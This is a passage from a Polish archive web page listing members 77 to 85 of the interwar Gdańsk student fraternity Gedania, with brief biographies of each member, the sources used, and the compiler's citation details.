 77. Jan Tukalski, (21 stycznia 1911 w Rzeżęcinie k. Tczewa - 1981 w Gdańsku) absolwent humanistycznego Gimnazjum w Tczewie 1931, student Wydziału Budownictwa Lądowego PG 1931-39, członek zarządu Bratniej Pomocy Studentów PG, oficer rez., w uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagu Gross-Born, później osadzony w więzieniu w Gdańsku, skąd został skierowany na przymusowe roboty do Rzeszy, po wojnie pracował jako urzędnik, a później kierownik wydziału komunikacji w Prezydium Wojewódzkiej Rady Narodowej w Gdańsku
 78. Antoni (Aleksander) Tymieniecki, student i absolwent (inż. mechanik) Wydziału Budowy Maszyn PG 1927-33, c. 1928, olderman sem. zim. 1932/33
 79. Edward (Edmund ?) Wajs, student PG 1922-28, założyciel Gedanii 1922
 80. Leon Wangler, (ok. 1900 - 1970 w Sopocie) student Wydziału Budownictwa Lądowego PG 1922-35, założyciel Gedanii 1922, wystąpił 1925/26, inicjator i założyciel Rosevii
 81. Roman Węglarczyk, ( - lata 80-te w Gdańsku) student PG 1932-39, po wojnie pracował w energetyce, m.in.. W Instytucie Elektrotechniki w Gdańsku i Zakładzie Energii Okręg Północ
 82. Stanisław Wichura, ( - 1939) z Zawiercia, student i absolwent Wydziału Lotniczego PG 1927-38, wieloletni prezes i członek Zarządu Koła Lotniczego i Aeroklubu Gdańskiego, po studiach rozpoczął pracę w przemyśle lotniczym, poległ w wojnie obronnej 1939
 83. Aleksander Wilas, ( - po 1945) student Wydziału Chemicznego PG 1927-34
 84. Marian Winiecki, ( - 1988) z Gdańska, student Wydziału Matematyczno-Fizycznego PG 1930-34

  Stanisław Woyna, 2006 r.

 85. Stanisław Woyna, (17 listopada 1910 w Pilznie k. Tarnowa - 2007) absolwent Państwowego Gimnazjum w Zakopanym 1930, student i absolwent Wydziału Elektrycznego PG 1931-38, c. 1932, prezes Gedanii 1935-36, kapitan sportowy AZS-u 1933-35, kilkukrotnie zdobywał I i II miejsce w Akademickich Mistrzostwach Polski w narciarstwie (w biegach zjazdowych), w 1939 po studiach rozpoczął pracę w kopalni w Radlinie k. Rybnika, w czasie okupacji jako robotnik w warsztatach kolejowych w Nowym Sączu, od 1945 pracownik Zakładów Energetycznych Okręgu Południowego, m.in. dyrektor Budowy Elektrowni “Miechowice”, główny specjalista, kurator budów nowych elektrowni Blachownia I i II, odznaczony Krzyżem Kawalerskim OOP

Pieczęć Gedanii, 1939 r.

Listę członków opracowano na podstawie:

1) Zbigniew Osuchowski, Lista członków Polskiej Korporacji Akademickiej Gedania (Gdańsk), (w:) Polskie Korporacje Akademickie 1995, nr 10, s. 39,
2) Księga Pamiątkowa Studentów Polaków Politechniki Gdańskiej w latach 1904-1939, Gdańsk 1993; Suplement do Księgi Pamiątkowej z 1993 roku Studentów Polaków Politechniki Gdańskiej 1904-1939, Gdańsk 1994,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Gedania.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 28 VII 2010 r.
Ostatnia zmiana: 17 IX 2017 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja “Polski Związek Akademicki Gedania” (Gdańsk), (na:) www.archiwumkorporacyjne.pl, stan 17 IX 2017 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }